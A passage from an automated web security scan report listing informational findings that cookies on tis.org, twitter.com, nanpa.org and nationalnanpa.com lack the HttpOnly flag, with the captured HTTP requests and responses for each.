The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

13.34. http://tis.org/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://tis.org
Path:	/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

COOKIE=10.5.16.243.1305160986882003; path=/
t=cd7bec407c3011e0b0290015c5e75168; path=/
referrer=tis.org; path=/
Template--tis.org=3D_Bars; path=/
FeedProvider--tis.org=Google; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: tis.org
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive

Response

13.35. http://twitter.com/javascripts/blogger.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://twitter.com
Path:	/javascripts/blogger.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

k=173.193.214.243.1305161327058682; path=/; expires=Thu, 19-May-11 00:48:47 GMT; domain=.twitter.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /javascripts/blogger.js HTTP/1.1
Host: twitter.com
Proxy-Connection: keep-alive
Referer: http://www.secviz.org/node/89
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: guest_id=130340348934320043; __utmz=43838368.1303561994.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); js=1; __utma=43838368.551233229.1303561994.1304617828.1304721594.4
If-Modified-Since: Wed, 04 May 2011 17:32:26 GMT

Response

HTTP/1.1 304 Not Modified
Date: Thu, 12 May 2011 00:48:47 GMT
Server: Apache
Connection: close
Expires: Thu, 12 May 2011 00:53:47 GMT
Cache-Control: max-age=300
Vary: Accept-Encoding
Set-Cookie: k=173.193.214.243.1305161327058682; path=/; expires=Thu, 19-May-11 00:48:47 GMT; domain=.twitter.com

13.36. http://twitter.com/statuses/user_timeline/secviz.json previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://twitter.com
Path:	/statuses/user_timeline/secviz.json

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

k=173.193.214.243.1305161343071359; path=/; expires=Thu, 19-May-11 00:49:03 GMT; domain=.twitter.com
original_referer=ZLhHHTiegr8kpyX5k%2BwrH7KWx%2F5%2BVN6GIeAi2OckkTU%3D; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /statuses/user_timeline/secviz.json?callback=twitterCallback2&count=5 HTTP/1.1
Host: twitter.com
Proxy-Connection: keep-alive
Referer: http://www.secviz.org/node/89
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: guest_id=130340348934320043; __utmz=43838368.1303561994.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); js=1; __utma=43838368.551233229.1303561994.1304617828.1304721594.4

Response

13.37. http://www.nanpa.org/forums/external.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.nanpa.org
Path:	/forums/external.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

vblastvisit=1305158636; expires=Fri, 11-May-2012 00:03:56 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /forums/external.php?type=js HTTP/1.1
Host: www.nanpa.org
Proxy-Connection: keep-alive
Referer: http://nanpa.org/recent_forum_posts.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 00:03:56 GMT
Server: Apache
Set-Cookie: vblastvisit=1305158636; expires=Fri, 11-May-2012 00:03:56 GMT; path=/
Set-Cookie: vblastactivity=0; expires=Fri, 11-May-2012 00:03:56 GMT; path=/
Cache-Control: private
Pragma: private
X-UA-Compatible: IE=7
P3P: CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR NOR BUS UNI COM NAV INT", policyref="/w3c/p3p.xml"
Content-Length: 1293
Content-Type: text/html; charset=ISO-8859-1

   function thread(threadid, title, poster, threaddate, threadtime)
   {
       this.threadid = threadid;
       this.title = title;
       this.poster = poster;
       this.threaddate = threaddate;
       this.threadtime = thre
...[SNIP]...

13.38. http://www.nationalnanpa.com/area_code_maps/usmaps/ak.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.nationalnanpa.com
Path:	/area_code_maps/usmaps/ak.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

BIGipServernas-ns=2886707392.20480.0000; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /area_code_maps/usmaps/ak.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.nationalnanpa.com

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 00:07:54 GMT
Server: Apache
Last-Modified: Fri, 21 Aug 2009 18:56:05 GMT
ETag: "2872e-29b4-471ab6b933b40"
Accept-Ranges: bytes
Content-Length: 10676
Content-Type: image/gif
Set-Cookie: BIGipServernas-ns=2886707392.20480.0000; path=/

GIF89a............3..f..........3..33.3f.3..3..3..f..f3.ff.f..f..f......3..f..............3..f..............3..f.........3..3.33.f3..3..3..33.33333f33.33.33.3f.3f33ff3f.3f.3f.3..3.33.f3..3..3..3..3.33
...[SNIP]...

13.39. http://www.nationalnanpa.com/area_code_maps/usmaps/al.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.nationalnanpa.com
Path:	/area_code_maps/usmaps/al.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

BIGipServernas-ns=2886707392.20480.0000; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /area_code_maps/usmaps/al.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.nationalnanpa.com

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 00:07:54 GMT
Server: Apache
Last-Modified: Wed, 23 Jun 2010 18:17:36 GMT
ETag: "2873c-4a7d-489b68d637000"
Accept-Ranges: bytes
Content-Length: 19069
Content-Type: image/gif
Set-Cookie: BIGipServernas-ns=2886707392.20480.0000; path=/

GIF89a..................l0,+........w.....P.[8.............................m...vst................wC......XE7..................................................S.......jB...........T........m..........
...[SNIP]...

13.40. http://www.nationalnanpa.com/area_code_maps/usmaps/ar.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.nationalnanpa.com
Path:	/area_code_maps/usmaps/ar.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

BIGipServernas-ns=2869930176.20480.0000; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /area_code_maps/usmaps/ar.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.nationalnanpa.com

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 00:07:54 GMT
Server: Apache
Last-Modified: Fri, 21 Aug 2009 18:56:05 GMT
ETag: "a81c1-2351-471ab6b933b40"
Accept-Ranges: bytes
Content-Length: 9041
Content-Type: image/gif
Set-Cookie: BIGipServernas-ns=2869930176.20480.0000; path=/

GIF89a............3..f..........3..33.3f.3..3..3..f..f3.ff.f..f..f......3..f..............3..f..............3..f.........3..3.33.f3..3..3..33.33333f33.33.33.3f.3f33ff3f.3f.3f.3..3.33.f3..3..3..3..3.33
...[SNIP]...

13.41. http://www.nationalnanpa.com/area_code_maps/usmaps/az.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.nationalnanpa.com
Path:	/area_code_maps/usmaps/az.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

BIGipServernas-ns=2886707392.20480.0000; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /area_code_maps/usmaps/az.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.nationalnanpa.com

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 00:07:54 GMT
Server: Apache
Last-Modified: Fri, 21 Aug 2009 18:56:06 GMT
ETag: "28743-20c2-471ab6ba27d80"
Accept-Ranges: bytes
Content-Length: 8386
Content-Type: image/gif
Set-Cookie: BIGipServernas-ns=2886707392.20480.0000; path=/

GIF89a............3..f..........3..33.3f.3..3..3..f..f3.ff.f..f..f......3..f..............3..f..............3..f.........3..3.33.f3..3..3..33.33333f33.33.33.3f.3f33ff3f.3f.3f.3..3.33.f3..3..3..3..3.33
...[SNIP]...

13.42. http://www.nationalnanpa.com/area_code_maps/usmaps/ca.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.nationalnanpa.com
Path:	/area_code_maps/usmaps/ca.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

BIGipServernas-ns=2869930176.20480.0000; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /area_code_maps/usmaps/ca.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.nationalnanpa.com

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 00:07:56 GMT
Server: Apache
Last-Modified: Fri, 13 Nov 2009 19:55:04 GMT
ETag: "a81de-adbd-47846092f9600"
Accept-Ranges: bytes
Content-Length: 44477
Content-Type: image/gif
Set-Cookie: BIGipServernas-ns=2869930176.20480.0000; path=/

GIF89a...............u..v.....f...............Tm.......j..........................EE:..
................lW...fgX...]]]vxf............r...............n.1P.++)....................m........[............U
...[SNIP]...

13.43. http://www.nationalnanpa.com/area_code_maps/usmaps/co.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.nationalnanpa.com
Path:	/area_code_maps/usmaps/co.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

BIGipServernas-ns=2886707392.20480.0000; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /area_code_maps/usmaps/co.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.nationalnanpa.com

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 00:07:56 GMT
Server: Apache
Last-Modified: Fri, 21 Aug 2009 18:56:07 GMT
ETag: "28727-208f-471ab6bb1bfc0"
Accept-Ranges: bytes
Content-Length: 8335
Content-Type: image/gif
Set-Cookie: BIGipServernas-ns=2886707392.20480.0000; path=/

GIF89a............3..f..........3..33.3f.3..3..3..f..f3.ff.f..f..f......3..f..............3..f..............3..f.........3..3.33.f3..3..3..33.33333f33.33.33.3f.3f33ff3f.3f.3f.3..3.33.f3..3..3..3..3.33
...[SNIP]...

13.44. http://www.nationalnanpa.com/area_code_maps/usmaps/ct.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.nationalnanpa.com
Path:	/area_code_maps/usmaps/ct.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

BIGipServernas-ns=2869930176.20480.0000; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /area_code_maps/usmaps/ct.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.nationalnanpa.com

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 00:07:56 GMT
Server: Apache
Last-Modified: Mon, 07 Dec 2009 19:47:45 GMT
ETag: "a81c6-6275-47a28bb35fa40"
Accept-Ranges: bytes
Content-Length: 25205
Content-Type: image/gif
Set-Cookie: BIGipServernas-ns=2869930176.20480.0000; path=/

GIF89a . ...........a..e"........{..N.......n-.....e...............z|j....?E...=>5.....C..................w8.....U..................[]O..Y..p-.'......kl].......m.........wLMB................}H....o0.
...[SNIP]...

13.45. http://www.nationalnanpa.com/area_code_maps/usmaps/dc.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.nationalnanpa.com
Path:	/area_code_maps/usmaps/dc.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

BIGipServernas-ns=2886707392.20480.0000; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /area_code_maps/usmaps/dc.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.nationalnanpa.com

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 00:07:57 GMT
Server: Apache
Last-Modified: Fri, 21 Aug 2009 18:56:07 GMT
ETag: "2871a-182b-471ab6bb1bfc0"
Accept-Ranges: bytes
Content-Length: 6187
Content-Type: image/gif
Set-Cookie: BIGipServernas-ns=2886707392.20480.0000; path=/

GIF89a............3..f..........3..33.3f.3..3..3..f..f3.ff.f..f..f......3..f..............3..f..............3..f.........3..3.33.f3..3..3..33.33333f33.33.33.3f.3f33ff3f.3f.3f.3..3.33.f3..3..3..3..3.33
...[SNIP]...

13.46. http://www.nationalnanpa.com/area_code_maps/usmaps/de.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.nationalnanpa.com
Path:	/area_code_maps/usmaps/de.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

BIGipServernas-ns=2869930176.20480.0000; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /area_code_maps/usmaps/de.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.nationalnanpa.com

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 00:07:57 GMT
Server: Apache
Last-Modified: Fri, 21 Aug 2009 18:56:07 GMT
ETag: "a81c5-3284-471ab6bb1bfc0"
Accept-Ranges: bytes
Content-Length: 12932
Content-Type: image/gif
Set-Cookie: BIGipServernas-ns=2869930176.20480.0000; path=/

GIF89a............3..f..........3..33.3f.3..3..3..f..f3.ff.f..f..f......3..f..............3..f..............3..f.........3..3.33.f3..3..3..33.33333f33.33.33.3f.3f33ff3f.3f.3f.3..3.33.f3..3..3..3..3.33
...[SNIP]...

13.47. http://www.nationalnanpa.com/area_code_maps/usmaps/fl.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.nationalnanpa.com
Path:	/area_code_maps/usmaps/fl.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

BIGipServernas-ns=2869930176.20480.0000; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /area_code_maps/usmaps/fl.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.nationalnanpa.com

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 00:07:57 GMT
Server: Apache
Last-Modified: Fri, 21 Aug 2009 18:56:07 GMT
ETag: "a81e9-345f-471ab6bb1bfc0"
Accept-Ranges: bytes
Content-Length: 13407
Content-Type: image/gif
Set-Cookie: BIGipServernas-ns=2869930176.20480.0000; path=/

GIF89a............3..f..........3..33.3f.3..3..3..f..f3.ff.f..f..f......3..f..............3..f..............3..f.........3..3.33.f3..3..3..33.33333f33.33.33.3f.3f33ff3f.3f.3f.3..3.33.f3..3..3..3..3.33
...[SNIP]...

13.48. http://www.nationalnanpa.com/area_code_maps/usmaps/ga.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.nationalnanpa.com
Path:	/area_code_maps/usmaps/ga.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

BIGipServernas-ns=2869930176.20480.0000; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /area_code_maps/usmaps/ga.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.nationalnanpa.com

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 00:07:57 GMT
Server: Apache
Last-Modified: Fri, 21 Aug 2009 18:56:07 GMT
ETag: "a81d1-baf4-471ab6bb1bfc0"
Accept-Ranges: bytes
Content-Length: 47860
Content-Type: image/gif
Set-Cookie: BIGipServernas-ns=2869930176.20480.0000; path=/

GIF89a.........C...LL4.......KR......ST......e......................(....oo........jq...11....33&.....gppn..t...............SSB..t........|.
..[....z.................hFdeE....W:.......5!..l..........
...[SNIP]...

13.49. http://www.nationalnanpa.com/area_code_maps/usmaps/hi.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.nationalnanpa.com
Path:	/area_code_maps/usmaps/hi.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

BIGipServernas-ns=2886707392.20480.0000; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /area_code_maps/usmaps/hi.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.nationalnanpa.com

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 00:07:58 GMT
Server: Apache
Last-Modified: Fri, 21 Aug 2009 18:56:07 GMT
ETag: "28728-20cb-471ab6bb1bfc0"
Accept-Ranges: bytes
Content-Length: 8395
Content-Type: image/gif
Set-Cookie: BIGipServernas-ns=2886707392.20480.0000; path=/

GIF89a............3..f..........3..33.3f.3..3..3..f..f3.ff.f..f..f......3..f..............3..f..............3..f.........3..3.33.f3..3..3..33.33333f33.33.33.3f.3f33ff3f.3f.3f.3..3.33.f3..3..3..3..3.33
...[SNIP]...

13.50. http://www.nationalnanpa.com/area_code_maps/usmaps/ia.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.nationalnanpa.com
Path:	/area_code_maps/usmaps/ia.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

BIGipServernas-ns=2869930176.20480.0000; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /area_code_maps/usmaps/ia.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.nationalnanpa.com

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 00:07:58 GMT
Server: Apache
Last-Modified: Fri, 21 Aug 2009 18:56:07 GMT
ETag: "a81f5-2624-471ab6bb1bfc0"
Accept-Ranges: bytes
Content-Length: 9764
Content-Type: image/gif
Set-Cookie: BIGipServernas-ns=2869930176.20480.0000; path=/

GIF89a............3..f..........3..33.3f.3..3..3..f..f3.ff.f..f..f......3..f..............3..f..............3..f.........3..3.33.f3..3..3..33.33333f33.33.33.3f.3f33ff3f.3f.3f.3..3.33.f3..3..3..3..3.33
...[SNIP]...

13.51. http://www.nationalnanpa.com/area_code_maps/usmaps/id.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.nationalnanpa.com
Path:	/area_code_maps/usmaps/id.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

BIGipServernas-ns=2869930176.20480.0000; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /area_code_maps/usmaps/id.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.nationalnanpa.com

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 00:07:58 GMT
Server: Apache
Last-Modified: Fri, 21 Aug 2009 18:56:07 GMT
ETag: "a81d6-1bb1-471ab6bb1bfc0"
Accept-Ranges: bytes
Content-Length: 7089
Content-Type: image/gif
Set-Cookie: BIGipServernas-ns=2869930176.20480.0000; path=/

GIF89a............3..f..........3..33.3f.3..3..3..f..f3.ff.f..f..f......3..f..............3..f..............3..f.........3..3.33.f3..3..3..33.33333f33.33.33.3f.3f33ff3f.3f.3f.3..3.33.f3..3..3..3..3.33
...[SNIP]...

13.52. http://www.nationalnanpa.com/area_code_maps/usmaps/il.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.nationalnanpa.com
Path:	/area_code_maps/usmaps/il.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

BIGipServernas-ns=2869930176.20480.0000; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /area_code_maps/usmaps/il.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.nationalnanpa.com

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 00:07:58 GMT
Server: Apache
Last-Modified: Fri, 06 Nov 2009 19:09:21 GMT
ETag: "a81d5-7594-477b894cd1a40"
Accept-Ranges: bytes
Content-Length: 30100
Content-Type: image/gif
Set-Cookie: BIGipServernas-ns=2869930176.20480.0000; path=/

GIF89a . ....8$...`...L6'..W[8%.......a..e"..{..Nz|j...=>5.......Y....n-.........-.'......[]O..e.......w8..w..Ckl].......?ELMB...........p........Y@@@.o0....ot....................L..........x>@..```
...[SNIP]...

13.53. http://www.nationalnanpa.com/area_code_maps/usmaps/in.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.nationalnanpa.com
Path:	/area_code_maps/usmaps/in.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

BIGipServernas-ns=2869930176.20480.0000; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /area_code_maps/usmaps/in.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.nationalnanpa.com

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 00:07:59 GMT
Server: Apache
Last-Modified: Fri, 21 Aug 2009 18:56:07 GMT
ETag: "a81f7-26ad-471ab6bb1bfc0"
Accept-Ranges: bytes
Content-Length: 9901
Content-Type: image/gif
Set-Cookie: BIGipServernas-ns=2869930176.20480.0000; path=/

GIF89a............3..f..........3..33.3f.3..3..3..f..f3.ff.f..f..f......3..f..............3..f..............3..f.........3..3.33.f3..3..3..33.33333f33.33.33.3f.3f33ff3f.3f.3f.3..3.33.f3..3..3..3..3.33
...[SNIP]...

13.54. http://www.nationalnanpa.com/area_code_maps/usmaps/ks.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.nationalnanpa.com
Path:	/area_code_maps/usmaps/ks.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

BIGipServernas-ns=2886707392.20480.0000; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /area_code_maps/usmaps/ks.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.nationalnanpa.com

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 00:07:59 GMT
Server: Apache
Last-Modified: Fri, 21 Aug 2009 18:56:08 GMT
ETag: "28732-1f54-471ab6bc10200"
Accept-Ranges: bytes
Content-Length: 8020
Content-Type: image/gif
Set-Cookie: BIGipServernas-ns=2886707392.20480.0000; path=/

GIF89a............3..f..........3..33.3f.3..3..3..f..f3.ff.f..f..f......3..f..............3..f..............3..f.........3..3.33.f3..3..3..33.33333f33.33.33.3f.3f33ff3f.3f.3f.3..3.33.f3..3..3..3..3.33
...[SNIP]...

